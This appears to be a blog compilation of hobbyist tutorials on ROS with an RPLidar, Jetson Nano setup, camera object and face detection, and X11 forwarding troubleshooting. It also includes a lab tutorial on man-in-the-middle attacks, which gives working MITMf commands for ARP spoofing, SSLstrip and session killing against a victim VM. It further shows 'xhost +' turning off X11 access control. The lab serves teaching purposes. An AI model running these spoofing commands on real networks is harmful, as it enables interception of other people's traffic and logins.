RPLidar A1 with ROS Melodic on Ubuntu 18.04

If you own (for example) an NVIDIA Jetson Nano Developer Kit and an RPLidar, you can use ROS Melodic to realize obstacle avoidance or simultaneous localization and mapping (SLAM). Here is a beginner’s tutorial for installing the necessary software.

Requirements

  • Ubuntu 18.04 (for example on the NVIDIA Jetson Nano Developer Kit)
  • RPLIDAR A1

Objective

Install ROS Melodic on Ubuntu 18.04 with a Catkin workspace, using Python 2.7 for the RPLIDAR A1.

Preparation

If you already have the necessary packages installed, you can skip this step.

# update & upgrade
$ sudo apt update && sudo apt upgrade -y

# install needed packages
$ sudo apt install -y git build-essential
VirtualBox Guest Additions (optional)

If you run Ubuntu in VirtualBox it is recommended to install the Extension Pack and the VirtualBox Guest Additions.

# install needed packages
$ sudo apt install -y dkms linux-headers-$(uname -r)

# Menu -> Devices -> Insert Guest Additions Image

# reboot system
$ sudo reboot

Install ROS Melodic

For Ubuntu 18.04 you need ROS 1 (Robot Operating System) Melodic. The packages are not included in the standard sources.

Hint: If you want to use a newer version of Ubuntu (like 20.04), you need ROS Noetic (the last ROS 1 release) or ROS 2 instead!

Note: By default, ROS Melodic uses Python 2.7. The following description does not work with higher Python versions! It would also be possible to use Python 3.x, but the installation steps are slightly different.

Add ROS repository

The ROS Melodic installation is relatively easy but can take a while depending on the internet connection, as there are many packages to be installed.
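
Since the packages come from the ROS package server, first add the repository and its key. The two commands below follow the official ROS Melodic installation guide; verify the key and URL against the current wiki before use.

# add ROS package source
$ sudo sh -c 'echo "deb http://packages.ros.org/ros/ubuntu $(lsb_release -sc) main" > /etc/apt/sources.list.d/ros-latest.list'

# add ROS package key
$ sudo apt-key adv --keyserver 'hkp://keyserver.ubuntu.com:80' --recv-key C1CF6E31E6BADE8868B172B4F42ED6FBAB17C654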

# update and install packages
$ sudo apt update && sudo apt install -y ros-melodic-desktop-full python-rosdep python-rosinstall python-rosinstall-generator python-wstool

# verify installation (optional)
$ ls -la /opt/ros/melodic/

# add bashrc source
$ echo "source /opt/ros/melodic/setup.bash" >> $HOME/.bashrc
$ source $HOME/.bashrc

# initialize & update
$ sudo rosdep init && rosdep update

# show ros environment variables (optional)
$ printenv | grep ROS

Create a Catkin workspace

You now need a Catkin workspace with the necessary RPLIDAR package (which includes the RPLIDAR SDK from Slamtec).

# create and change into directory
$ mkdir -p $HOME/catkin_ws/src && cd $HOME/catkin_ws/src

# clone Git repository
$ git clone https://github.com/Slamtec/rplidar_ros.git

# change directory
$ cd $HOME/catkin_ws/

# build workspace
$ catkin_make

# verify directory content (optional)
$ ls -la devel/

# refresh environment variables
$ source devel/setup.bash

# verify path variable (optional)
$ echo $ROS_PACKAGE_PATH

# build node
$ catkin_make rplidarNode

Okay, that’s it… Wasn’t very difficult, but a lot of steps.

Start ROS Melodic

Now connect the RPLIDAR device. If you use VirtualBox, pass the USB device through from host to guest.

# list USB device and verify permissions
$ ls -la /dev | grep ttyUSB

# change permissions
$ sudo chmod 0666 /dev/ttyUSB0
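
Note that this chmod does not survive a reboot or replug. For permanent permissions you can create a udev rule instead; a minimal sketch is shown below (the rplidar_ros repository also ships helper scripts for this in its scripts/ directory).

# permanent permissions via udev rule (sketch, matches all ttyUSB devices)
$ echo 'KERNEL=="ttyUSB*", MODE="0666"' | sudo tee /etc/udev/rules.d/rplidar.rules
$ sudo udevadm control --reload-rules && sudo udevadm trigger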

From now on you need two terminals! Once you have successfully started roscore in the first terminal, switch to the second terminal.

# change directory
$ cd $HOME/catkin_ws/

# launch roscore
$ roscore

Note: Don’t close the first terminal or stop the running roscore process!

# change directory
$ cd $HOME/catkin_ws

# refresh environment variables
$ source $HOME/catkin_ws/devel/setup.bash

# run UI
$ roslaunch rplidar_ros view_rplidar.launch
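
If the viewer is running and you want to check the raw data as well, the standard ROS tooling helps; rplidar_ros publishes the laser scans on the /scan topic.

# list active topics (optional)
$ rostopic list

# print a single scan message
$ rostopic echo -n 1 /scan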

Sorry for using screenshots, but my provider doesn’t allow the use of certain words or characters. 🙁

OpenCV & SSD-Mobilenet-v2

The first steps with OpenCV and Haar cascades are done, and now it should really start. With other models you can easily detect more objects. In this tutorial I will therefore show you a different possibility with your Jetson Nano device. I recommend switching to desktop mode for performance reasons.

Requirements

  • Jetson Nano Developer Kit (2GB / 4GB)
  • 5V Fan installed (NF-A4x20 5V PWM)
  • CSI camera connected (Raspberry Pi Camera Module V2)

Note: You can also use any other compatible fan and camera.

Objective

The goal is to recognize objects and to mark and label them directly in the live stream from the CSI camera. OpenCV and SSD-Mobilenet-v2 with Python 3.6 are used in this tutorial.

Preparation

As always, it takes a few steps to prepare. This is very easy but can take a while.

# update (optional)
$ sudo apt update

# install needed packages
$ sudo apt install cmake libpython3-dev python3-numpy

# clone repository
$ git clone --recursive https://github.com/dusty-nv/jetson-inference.git

# change into cloned directory
$ cd jetson-inference/

# create and change into directory
$ mkdir build && cd build/

# configure build
$ cmake ../

# in the model downloader select only SSD-Mobilenet-v2
# all other models can be downloaded later
# PyTorch is also not needed yet and can be skipped

# build with specified job and install
$ make -j$(nproc)
$ sudo make install

# configure dynamic linker run-time bindings
$ sudo ldconfig
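
Before writing your own script, you can sanity-check the installation with the detectnet sample that ships with jetson-inference. The paths below assume the default build layout and that you are still inside the build directory.

# change into the binary directory and run the sample on a bundled test image
$ cd aarch64/bin
$ ./detectnet.py images/peds_0.jpg output.jpg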

CSI Camera Object detection

When the preparation is successfully completed, you can create the first simple Python script.

# create file and edit
$ vim CSICamObjectDetection.py

Here is the content of the script. The important points are commented.

#!/usr/bin/env python3

import jetson.inference
import jetson.utils
import cv2

# load the SSD-Mobilenet-v2 inference network
net = jetson.inference.detectNet("ssd-mobilenet-v2", threshold=0.5)


def gstreamer_pipeline(cap_width=1280,
                       cap_height=720,
                       disp_width=800,
                       disp_height=600,
                       framerate=21,
                       flip_method=2):
    return (
        "nvarguscamerasrc ! "
        "video/x-raw(memory:NVMM), "
        "width=(int)%d, height=(int)%d, "
        "format=(string)NV12, framerate=(fraction)%d/1 ! "
        "nvvidconv flip-method=%d ! "
        "video/x-raw, width=(int)%d, height=(int)%d, format=(string)BGRx ! "
        "videoconvert ! "
        "video/x-raw, format=(string)BGR ! appsink" % (cap_width,
                                                       cap_height,
                                                       framerate,
                                                       flip_method,
                                                       disp_width,
                                                       disp_height)
    )


# process csi camera
video_file = cv2.VideoCapture(gstreamer_pipeline(), cv2.CAP_GSTREAMER)

if video_file.isOpened():
    cv2.namedWindow("Detection result", cv2.WINDOW_AUTOSIZE)

    print('CSI stream opened. Press ESC or Ctrl + c to stop application')

    while cv2.getWindowProperty("Detection result", 0) >= 0:
        ret, frame = video_file.read()

        # stop if no frame could be read
        if not ret:
            break

        # convert BGR (OpenCV) to RGB, copy to GPU memory and detect
        imgRGB = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
        imgCuda = jetson.utils.cudaFromNumpy(imgRGB)
        detections = net.Detect(imgCuda)

        # draw rectangle and description
        for d in detections:
            x1, y1, x2, y2 = int(d.Left), int(d.Top), int(d.Right), int(d.Bottom)
            className = net.GetClassDesc(d.ClassID)
            cv2.rectangle(frame, (x1,y1), (x2, y2), (0, 0, 0), 2)
            cv2.putText(frame, className, (x1+5, y1+15), cv2.FONT_HERSHEY_DUPLEX, 0.75, (0, 0, 0), 2)

        # show frame
        cv2.imshow("Detection result", frame)

        # stop via ESC key
        keyCode = cv2.waitKey(30) & 0xFF
        if keyCode == 27:
            break

    # close
    video_file.release()
    cv2.destroyAllWindows()
else:
    print('unable to open csi stream')

Now you can run the script. The first run takes a while (TensorRT optimizes the network first), so please be patient.

# execute
$ python3 CSICamObjectDetection.py

# or with executable permissions
$ chmod +x CSICamObjectDetection.py
$ ./CSICamObjectDetection.py

I was fascinated by the results! I hope you feel the same way.

Invalid MIT-MAGIC-COOKIE-1

Problem

After an OS update including a restart of the system, an error occurs with SSH X11 forwarding. Instead of displaying the windows as usual, “Invalid MIT-MAGIC-COOKIE-1” is displayed in the terminal.

Here is an example. I connect from my macOS to the Ubuntu system and get the error message.

β”Œβ”€β”€[lupin@HackMac]::[~]
└─ % ssh -C4Y lupin@10.0.0.12

lupin@nano4gb:~$ xeyes
Invalid MIT-MAGIC-COOKIE-1 key
Error: Can't open display: localhost:10.0
lupin@nano4gb:~$ exit
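
For diagnosis, xauth shows which cookies are stored on the remote side (standard X11 tooling):

# on the remote machine: list the stored cookies
lupin@nano4gb:~$ xauth list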

1st Quick and dirty solution

Since I’m on my own, relatively secure network, I leave XQuartz running in the background, disable access control, reconnect, and everything works again.

β”Œβ”€β”€[lupin@HackMac]::[~]
└─ % xhost +
access control disabled, clients can connect from any host

β”Œβ”€β”€[lupin@HackMac]::[~]
└─ % ssh -C4Y lupin@10.0.0.12

lupin@nano4gb:~$ xeyes
lupin@nano4gb:~$ exit

This setting is (fortunately) only valid for this one session. As soon as I end the connection, restart XQuartz and establish a new SSH connection, the error message appears again. Anyway, not a nice solution!

2nd Quick and dirty solution

XQuartz offers the possibility to establish the connection without authentication. This solution is permanent and very simple to set up. Open the XQuartz settings and uncheck the respective checkbox.

XQuartz X11 Settings

Restart XQuartz, establish a new connection.

β”Œβ”€β”€[lupin@HackMac]::[~]
└─ % xhost
access control enabled, only authorized clients can connect

β”Œβ”€β”€[lupin@HackMac]::[~]
└─ % ssh -C4Y lupin@10.0.0.12

lupin@nano4gb:~$ xeyes
lupin@nano4gb:~$ exit
example for xeyes

Now everything works as usual. But even with this solution I have my doubts! So I undo the setting and restart XQuartz.

3rd Quick and dirty solution

As described in the previous step, I undid the setting and restarted XQuartz. Additionally I allowed local connections in the access control.

β”Œβ”€β”€[lupin@HackMac]::[~]
└─ % xhost
access control enabled, only authorized clients can connect

β”Œβ”€β”€[lupin@HackMac]::[~]
└─ % xhost +local:
non-network local connections being added to access control list

β”Œβ”€β”€[lupin@HackMac]::[~]
└─ % ssh -C4Y lupin@10.0.0.12

lupin@nano4gb:~$ xeyes
lupin@nano4gb:~$ exit

This solution also works but is not permanent and not secure.

What now?

Searching the internet didn’t really help me. Some of the suggested solutions are total nonsense (or I completely misunderstood them). I’ve also read the man pages, which even say that the environment variable $DISPLAY should not be changed. The first signs of despair appeared (also due to ignorance on my part)! Trust me, I also deleted all the recommended files, which did not change the situation.

My final Solution

In the end my problem was very easy to solve! I still had entries from an already deleted MacPorts installation in the .zprofile file, which set the local environment variable $DISPLAY. With the restart of my macOS, this export of the environment variable naturally became active again.
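
A quick grep over the shell profile files reveals such entries (a sketch, assuming zsh as on my system):

# search profile files for DISPLAY exports
$ grep -n 'DISPLAY' ~/.zprofile ~/.zshrc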

β”Œβ”€β”€[lupin@HackMac]::[~]
└─ % echo $DISPLAY
:0

β”Œβ”€β”€[lupin@HackMac]::[~]
└─ % vim .zprofile

# I deleted all old macports entries

β”Œβ”€β”€[lupin@HackMac]::[~]
└─ % sudo reboot

The result after the restart.

β”Œβ”€β”€[lupin@HackMac]::[~]
└─ % echo $DISPLAY           
/private/tmp/com.apple.launchd.ASpxDkLA98/org.xquartz:0

β”Œβ”€β”€[lupin@HackMac]::[~]
└─ % ssh -C4Y lupin@10.0.0.12

lupin@nano4gb:~$ xeyes

Everything is all right again. Oh yeah… that was troubleshooting. The good thing is I learned a lot about xhost and xauth, plus my own systems.

First steps with Jetson Nano 2GB Developer Kit (Part 3)

In the two previous parts you installed the Jetson Nano operating system and connected the necessary hardware peripherals. In this part you will learn how to recognize faces in pictures. In addition, it is shown how to do this remotely via SSH/X11 forwarding (headless).

Note: If you’d like to use the GUI, you can jump directly to the section “Python & OpenCV” and adapt the necessary steps.

Preparation

Since I use macOS myself, this tutorial will also be based on this. If you are a user of another operating system, search the Internet for the relevant solution for the “Preparation” section. However, the other sections are independent of the operating system.

If you haven’t done it yet, install XQuartz on your macOS now. To do this, download the latest version (as DMG) from the official site and run the installation. Of course, if you prefer to use a package manager like Homebrew, that’s also possible! If you are not logged out automatically after the installation, log out and back in yourself! That’s pretty much it. Nothing else should be needed besides starting XQuartz.

Now start the SSH connection to the Jetson Nano (while XQuartz is running in the background).

# connect via SSH
$ ssh -C4Y <user>@<nano ip>

X11 Forwarding

You might want to check your SSH configuration for X11 on the Jetson Nano first.

# verify current SSH configuration
$ sshd -T | grep -i 'x11\|forward'

The following settings are important: x11forwarding yes, x11uselocalhost yes and allowtcpforwarding yes. If these values are not set, you must configure them and restart the SSHD service. Normally, however, they are already preconfigured on the latest Jetson Nano OS versions.

# edit configuration
$ sudo vim /etc/ssh/sshd_config

# restart service after changes
$ sudo systemctl restart sshd

# check sshd status (optional)
$ sudo systemctl status sshd

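For reference, the relevant lines in sshd_config should then look like this:

# /etc/ssh/sshd_config (relevant lines)
X11Forwarding yes
X11UseLocalhost yes
AllowTcpForwarding yes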

You may have noticed that you established the SSH connection with “-Y” (trusted X11 forwarding). You can check the result with the environment variable $DISPLAY.

# show value of $DISPLAY (optional)
$ echo $DISPLAY
localhost:10.0

Attention: If the output is empty, check all previous steps carefully again!

Python & OpenCV

Normally Python 3.x and OpenCV are already installed. If you want to check this first, proceed as follows.

# verify python OpenCV version (optional)
$ python3
>>> import cv2
>>> cv2.__version__
>>> exit()

Then it finally starts. Now we develop the Python script and test with pictures whether we can recognize the faces of people. If you don’t have any pictures of people yet, check this page. The easiest way is to download the images into the HOME directory. But you can also create your own pictures with the USB or CSI camera.

# change into home directory
$ cd ~

# create python script file
$ touch face_detection.py

# start file edit
$ vim face_detection.py

Here is the content of the Python script.

#!/usr/bin/env python3

import argparse
from pathlib import Path
import sys
import cv2

# define argparse description/epilog
description = 'Image Face detection'
epilog = 'The author assumes no liability for any damage caused by use.'

# create argparse Object
parser = argparse.ArgumentParser(prog='./face_detection.py', description=description, epilog=epilog)

# set mandatory arguments
parser.add_argument('image', help="Image path", type=str)

# read arguments by user
args = parser.parse_args()

# set all variables
IMG_SRC = args.image
FRONTAL_FACE_XML_SRC = '/usr/share/opencv4/haarcascades/haarcascade_frontalface_default.xml'

# verify files existing
image = Path(IMG_SRC)
if not image.is_file():
    sys.exit('image not found')

haarcascade = Path(FRONTAL_FACE_XML_SRC)
if not haarcascade.is_file():
    sys.exit('haarcascade not found')

# process image
face_cascade = cv2.CascadeClassifier(FRONTAL_FACE_XML_SRC)
img = cv2.imread(cv2.samples.findFile(IMG_SRC))
gray_scale = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
detect_face = face_cascade.detectMultiScale(gray_scale, 1.3, 5)

for (x_pos, y_pos, width, height) in detect_face:
    cv2.rectangle(img, (x_pos, y_pos), (x_pos + width, y_pos + height), (10, 10, 255), 2)

# show result
cv2.imshow("Detection result", img)

# close
cv2.waitKey(0)
cv2.destroyAllWindows()

Hint: You may have noticed that we use existing XML files in the script. Have a look at that path, there are more resources.

# list all haarcascade XML files
$ ls -lh /usr/share/opencv4/haarcascades/

When everything is done, start the script, specifying the image argument.

# run script
$ python3 face_detection.py <image>

# or with executable permissions
$ chmod +x face_detection.py
$ ./face_detection.py <image>

You should now see the respective results. With this we end the 3rd part. Customize or extend the script as you wish.

First steps with Jetson Nano 2GB Developer Kit (Part 2)

In the first part I explained the initial setup of the Jetson Nano 2GB Developer Kit. This second part should help with additional (but required) hardware like the fan and the CSI camera.

Preparation

If you are still connected via SSH (or serial) and the Jetson Nano is still running, you have to shut it down now.

# shutdown
$ sudo shutdown -h 0

Connect the fan and the camera and make sure that all connections are made correctly! If you are not sure, look for the respective video on this very helpful website. As soon as you are done, you can restart the Jetson Nano and connect.

Note: The screws that come with the fan are too big. So I simply used cable ties. Otherwise I can really recommend this fan.

Fan

As soon as you have started and logged in again, you should check whether the fan is basically running.

# turn on fan
$ sudo sh -c 'echo 255 > /sys/devices/pwm-fan/target_pwm'

# turn off fan
$ sudo sh -c 'echo 0 > /sys/devices/pwm-fan/target_pwm'

If that worked, the easiest way is to use the code provided on GitHub to start/stop the fan fully automatically at certain temperatures.

# clone repository
$ git clone https://github.com/Pyrestone/jetson-fan-ctl.git

# change into cloned repository
$ cd jetson-fan-ctl

# start installation
$ sudo ./install.sh

# check service (optional)
$ sudo systemctl status automagic-fan

You can also change the values for your own needs.

# edit via vim
$ sudo vim /etc/automagic-fan/config.json

# restart service after changes
$ sudo systemctl restart automagic-fan
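
For orientation, the config.json contains settings roughly like the following. The key names are taken from the jetson-fan-ctl README; treat the values as examples and verify them in the repository.

{
  "FAN_OFF_TEMP": 20,
  "FAN_MAX_TEMP": 50,
  "UPDATE_INTERVAL": 2,
  "MAX_PERF": 1
}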


From now on, your Jetson Nano should be protected against overheating too quickly. If you want to check the current values yourself, simply call up the following commands.

# show thermal zones
$ cat /sys/devices/virtual/thermal/thermal_zone*/type
$ cat /sys/devices/virtual/thermal/thermal_zone*/temp
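
To pair each zone type with its temperature, a small bash one-liner with process substitution helps (the values are in millidegrees Celsius):

# show zone type and temperature side by side (divide temp by 1000 for °C)
$ paste <(cat /sys/devices/virtual/thermal/thermal_zone*/type) <(cat /sys/devices/virtual/thermal/thermal_zone*/temp)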

Camera

The CSI camera doesn’t need any additional packages; everything you need is already installed. So after booting up, you can start right away.

Important: Do not attach the CSI camera while the device is running!

# list video devices
$ ls -l /dev/video0
crw-rw----+ 1 root video 81, 0 Jan  9 12:07 /dev/video0

An additional package lets you find out the capabilities of the camera.

# install package (optional)
$ sudo apt install -y v4l-utils

# list information (optional)
$ v4l2-ctl --list-formats-ext
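
If a monitor is attached to the Jetson Nano, a minimal GStreamer pipeline gives you a quick live preview (nvarguscamerasrc comes with JetPack):

# live preview on an attached monitor (stop with Ctrl + c)
$ gst-launch-1.0 nvarguscamerasrc ! nvoverlaysink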

Take a picture

# take picture and save to disk
$ nvgstcapture-1.0 --orientation=2 --image-res=2

# Press j and ENTER to take a picture
# Press q and ENTER to exit

# list stored pictures
$ ls -lh nvcamtest_*
-rw-rw-r-- 1 lupin lupin 20K Jan  9 15:39 nvcamtest_7669_s00_00000.jpg

Now record a video. Be careful with your disk space!

# take video and save to disk
$ nvgstcapture-1.0 --orientation 2 --mode=2

# Press 1 and ENTER to start record
# Press 0 and ENTER to stop record
# Press q and ENTER to exit

$ ls -lh *.mp4
-rw-rw-r-- 1 lupin lupin 3,0M Jan  9 15:52 nvcamtest_8165_s00_00000.mp4

That’s it for this time.

First steps with Jetson Nano 2GB Developer Kit (Part 1)

The Jetson Nano Developer Kits are awesome for getting started with artificial intelligence and machine learning. To make your learning more successful, I will use this tutorial to explain some important first steps.

Requirements

The values in brackets indicate the hardware I am using. However, you can use other compatible hardware. Before you buy, see the documentation provided by Nvidia. There you will also find a page with a lot of useful information collected in one place.

  • Jetson Nano Developer Kit (2GB with WiFi)
  • 5V Fan (NF-A4x20 5V PWM)
  • USB or CSI camera (Raspberry Pi Camera Module V2)
  • Power Supply (Raspberry Pi 15W USB-C Power Supply)
  • Micro SD Card (SanDisk Ultra microSDXC UHS-I A1 64 GB)

Additional hardware:

  • Monitor & HDMI cable
  • Mouse & Keyboard
  • USB cable (Delock USB 2.0 cable, USB-C to Micro-USB B, 1 m)

Objective

The first part provides information about the needed parts to buy and describes the necessary installation (headless).

Installation

After downloading the SD card image (Linux4Tegra, based on Ubuntu 18.04), you can write it to the SD card immediately. Make sure to use the correct image for your device! Here is a short overview of the commands if you use macOS.

# list all attached disk devices
$ diskutil list external | fgrep '/dev/disk'

# partitioning a disk device (incl. delete)
$ sudo diskutil partitionDisk /dev/disk<n> 1 GPT "Free Space" "%noformat%" 100%

# extract archive and write to disk device
$ /usr/bin/unzip -p ~/Downloads/jetson-nano-2gb-jp46-sd-card-image.zip | sudo /bin/dd of=/dev/rdisk<n> bs=1m

There is no automatic indication of the dd progress but you can press [control] + [t] while dd is running.
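
When dd has finished, eject the card before removing it.

# eject the SD card after writing
$ sudo diskutil eject /dev/rdisk<n>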

The setup and boot of the Jetson Nano can be done in two different ways (with GUI or headless). If you choose the headless setup, connect your computer to the Micro-USB port of the Jetson Nano and follow the next instructions.

# list serial devices (optional)
$ ls /dev/cu.usbmodem*

# list serial devices (long listing format)
$ ls -l /dev/cu.usbmodem*
crw-rw-rw-  1 root  wheel   18,  24 Dec  2 07:23 /dev/cu.usbmodem<n>

# connect with terminal emulation
$ sudo screen /dev/cu.usbmodem<n> 115200

Now simply follow the initial setup steps and reboot the device after you finish.

Connect to WiFi

If you have not set up WiFi during the initial setup, you can connect again via the serial interface and follow the next steps.

# connect with terminal emulation
$ sudo screen /dev/cu.usbmodem<n> 115200

# enable (if WiFi is disabled)
$ nmcli r wifi on

# list available WiFi's
$ nmcli d wifi list

# connect to WiFi
$ nmcli d wifi connect <SSID> password <password>

# show status (optional)
$ nmcli dev status

# show connections (optional)
$ nmcli connection show

Finally you can run the update and install additional needed packages.

# update packages
$ sudo apt update -y && sudo apt upgrade -y

# install packages (optional)
$ sudo apt install -y vim tree

From this point on, nothing should stand in the way of the SSH connection, provided you are in the same network.

# get IP (on Jetson device)
$ ip -4 a

# connect via SSH (example for local device)
β”Œβ”€β”€[lupin@HackMac]::[~]
└─ % ssh -C4 <user>@<ip>

In Part 2 we will add the fan (incl. installation of the needed software) and the camera.

Man in the Middle Attack (MITM)

In this tutorial you will learn how a man-in-the-middle attack works. For this you will create and configure a simple test environment. The test environment simulates a small home network with a NAT router, a client (victim) and another client (evil) that has already penetrated the network. For the attack itself, you will get to know the popular MITMf framework.

Attention: This tutorial is presented for educational purposes only. If you apply what you have learned outside the test environment, you may be liable to prosecution.

Requirements

  • VirtualBox (5.2.18)
  • Vagrant (2.1.5)

Prepare environment

In the first step, you need to configure, set up and provision the environment. Vagrant will help you here. Via Vagrant you will create all needed virtual machines (incl. SSH keys) and install the needed packages on the evil machine. Via the machines.yml file you could also add Vagrant boxes for Windows or macOS.

# create project
$ mkdir -p ~/Projects/ExampleEnv && cd ~/Projects/ExampleEnv

# create needed files
$ touch Vagrantfile machines.yml

# edit machines.yml (copy content into file)
$ vim machines.yml

# edit Vagrantfile (copy content into file)
$ vim Vagrantfile

# run Vagrant
$ vagrant up

Here is the content of machines.yml:

---
  - name: evil
    box: debian/stretch64
    cpus: 1
    memory: 1024
  - name: victim
    box: chad-thompson/ubuntu-trusty64-gui
    cpus: 1
    memory: 1024

And here is the content of the Vagrantfile:

# -*- mode: ruby -*-
# vi: set ft=ruby :

require 'yaml'
machines = YAML.load_file('machines.yml')

Vagrant.configure("2") do |config|
  machines.each do |machine_config|
    config.vm.define machine_config["name"] do |machine|

      # define vagrant box
      machine.vm.box = machine_config["box"]
      # disable default synced_folder
      machine.vm.synced_folder ".", "/vagrant", disabled: true
      # configure virtualbox
      machine.vm.provider :virtualbox do |vb|
        vb.name = machine_config["name"]
        vb.cpus = machine_config["cpus"]
        vb.memory = machine_config["memory"]
        vb.gui = false
      end
      # provisioning: only evil
      if machine_config["name"] == 'evil'
        machine.vm.provision "shell", inline: <<-SHELL
          echo 'deb http://http.kali.org/kali kali-rolling main non-free contrib' >> /etc/apt/sources.list
          echo 'deb-src http://http.kali.org/kali kali-rolling main non-free contrib' >> /etc/apt/sources.list
          apt-get update
          apt-get install -y --allow-unauthenticated mitmf
        SHELL
      end

    end
  end
end

Small network changes

You must now switch from the typical NAT to a NAT network. For that, stop (halt) all VMs. In the next steps you will create a new NAT network and configure the VM network adapters for this network. In the end, you have simulated a simple home network.

# stop all VM's
$ vagrant halt

# create new VirtualBox NAT-Network
$ VBoxManage natnetwork add --netname homenet --network "192.168.15.0/24" --enable --dhcp on --ipv6 off

# list all NAT-Networks (optional)
$ VBoxManage list natnetworks

# change interfaces from NAT to NAT-Network for evil VM
$ VBoxManage modifyvm evil --nic1 natnetwork --nat-network1 homenet

# change mac address for evil VM
$ VBoxManage modifyvm evil --macaddress1 08002707B96E

# show network configuration for evil (optional)
$ VBoxManage showvminfo evil | grep "NIC"

# change interfaces from NAT to NAT-Network for victim VM
$ VBoxManage modifyvm victim --nic1 natnetwork --nat-network1 homenet

# change mac address for victim VM
$ VBoxManage modifyvm victim --macaddress1 080027C0B653

# some Ubuntu VirtualBox changes
$ VBoxManage modifyvm victim --accelerate3d on --vram 128

# show network configuration for victim (optional)
$ VBoxManage showvminfo victim | grep "NIC"

Start all VMs again

In this step we start all VMs, but without Vagrant.

# start evil VM
$ VBoxManage startvm evil

# start victim VM
$ VBoxManage startvm victim

Now check the network interfaces of both VMs. Please note down the IPs, you will need them in the next steps. You can log in to both with the credentials vagrant:vagrant.

# evil VM
$ ip -4 addr
...
inet 192.168.15.5

# victim VM
$ ip -4 addr
...
192.168.15.6

Note: In the example the evil VM has the IP: 192.168.15.5 and the victim the IP: 192.168.15.6 – this could be different for you.

In order not to have to use the VirtualBox terminal, create a port forward from localhost to the evil VM.

# add port forwarding from localhost to evil VM
$ VBoxManage natnetwork modify --netname homenet --port-forward-4 "evilssh:tcp:[]:2222:[192.168.15.5]:22"

# ssh connection to evil
$ ssh -i .vagrant/machines/evil/virtualbox/private_key -p 2222 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null vagrant@localhost

Man-in-the-middle attack

You made it, the test environment is finally ready. If you have been able to learn something new up to this point, I am glad. Now imagine the following situation: you are the victim, surfing the Internet and logging in to your favorite websites. Can you imagine what can happen? In a few minutes you will see it.

Once Ubuntu has booted, run the following commands (as evil) and surf the web using the Firefox browser (as victim). If mitmf returns an error message, repeat the command in the terminal. Be a bit patient after a successful call.

# change to root
$ sudo su -

# enable ip4_forward (only this session)
$ sysctl -w net.ipv4.ip_forward=1

# check ip4_forwarding is enabled (optional)
$ sysctl net.ipv4.ip_forward
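
If you want the forwarding to survive a reboot (optional; standard sysctl persistence, we are already root here):

# make IPv4 forwarding permanent (optional)
$ echo 'net.ipv4.ip_forward=1' >> /etc/sysctl.conf
$ sysctl -p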

# start mitmf (incl. ARP spoofing)
$ mitmf --spoof --arp -i eth0 --gateway 192.168.15.1 --target 192.168.15.6

# start mitmf (incl. ARP spoofing, enabled SSLstrip, Session kill)
$ mitmf --spoof --arp --hsts -k -i eth0 --gateway 192.168.15.1 --target 192.168.15.6
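
To verify that the ARP spoofing works, check the ARP table on the victim VM; the gateway entry should now show the evil VM’s MAC address (08:00:27:07:b9:6e, as set earlier):

# on the victim VM: show the ARP table
$ arp -n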

MITMf offers a lot more plug-ins, just give them a try.

Build notifications with CatLight

CatLight is the perfect app if you would like to know the current status of your continuous delivery pipelines, tasks and bugs. Without looking at e-mails or visiting build servers, you know when attention is needed. It’s available for Debian, Ubuntu, Windows and macOS.

CatLight works with Jenkins, TFS, Travis CI and many more.

catlight setup

After successful installation and configuration, CatLight offers a lot of cool features.

catlight jobs

For personal usage it’s free, you only have to register.